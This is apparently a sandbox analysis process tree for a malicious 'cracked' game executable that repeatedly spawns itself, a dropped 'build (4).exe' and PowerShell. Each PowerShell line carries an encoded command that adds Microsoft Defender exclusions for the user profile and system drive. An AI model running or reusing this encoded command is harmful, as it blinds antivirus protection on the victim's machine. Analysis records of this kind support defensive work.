C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="92⤵PID:648
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"92⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"92⤵PID:2396
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="93⤵PID:7564
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"93⤵PID:5420
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"93⤵PID:5012
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="94⤵PID:6972
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"94⤵PID:4908
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"94⤵PID:7588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="95⤵PID:8012
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"95⤵PID:5456
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"95⤵PID:7860
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="96⤵PID:7964
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"96⤵PID:6636
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"96⤵PID:7524
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="97⤵PID:4880
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"97⤵PID:5548
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"97⤵PID:2812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="98⤵PID:7748
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"98⤵PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"98⤵PID:7684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="99⤵PID:2316
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"99⤵PID:5944
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"99⤵PID:3016
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="100⤵PID:2296
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"100⤵PID:6672
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"100⤵PID:5616
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="101⤵PID:5976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1102⤵PID:1512
-
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"101⤵PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"101⤵
- System Location Discovery: System Language Discovery
PID:3696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="102⤵PID:5528
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1103⤵PID:1456
-
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"102⤵PID:7988
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"102⤵PID:2812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="103⤵
- System Location Discovery: System Language Discovery
PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"103⤵PID:7124
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"103⤵PID:5072
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="104⤵PID:7024
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"104⤵PID:3380
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"104⤵PID:6996
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="105⤵PID:2268
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"105⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"105⤵
- System Location Discovery: System Language Discovery
PID:6712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="106⤵PID:5572
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"106⤵PID:7368
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"106⤵PID:6792
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="107⤵PID:2824
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"107⤵PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"107⤵PID:6716
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="108⤵PID:6044
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1109⤵PID:6996
-
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"108⤵PID:6712
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"108⤵PID:3928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="109⤵PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"109⤵PID:3792
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"109⤵PID:7112
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="110⤵PID:7500
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"110⤵
- System Location Discovery: System Language Discovery
PID:7244
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"110⤵PID:484
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="111⤵PID:4456
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"111⤵PID:7132
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"111⤵PID:5192
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="112⤵
- System Location Discovery: System Language Discovery
PID:5260
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"112⤵PID:7128
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"112⤵PID:1256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="113⤵PID:6568
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"113⤵PID:6072
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"113⤵PID:3368
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="114⤵PID:6520
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"114⤵PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"114⤵PID:8052
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="115⤵PID:6384
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"115⤵
- System Location Discovery: System Language Discovery
PID:5192
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"115⤵PID:6836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="116⤵PID:7896
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"116⤵PID:1396
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"116⤵PID:7420
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="117⤵PID:8812
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"117⤵PID:8820
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"117⤵PID:8836
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="118⤵PID:9000
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"118⤵PID:9008
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"118⤵PID:9108
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="119⤵PID:7908
-
-
C:\Users\Admin\AppData\Local\Temp\build (4).exe"C:\Users\Admin\AppData\Local\Temp\build (4).exe"119⤵PID:7952
-
-
C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"119⤵
- System Location Discovery: System Language Discovery
PID:6860 -
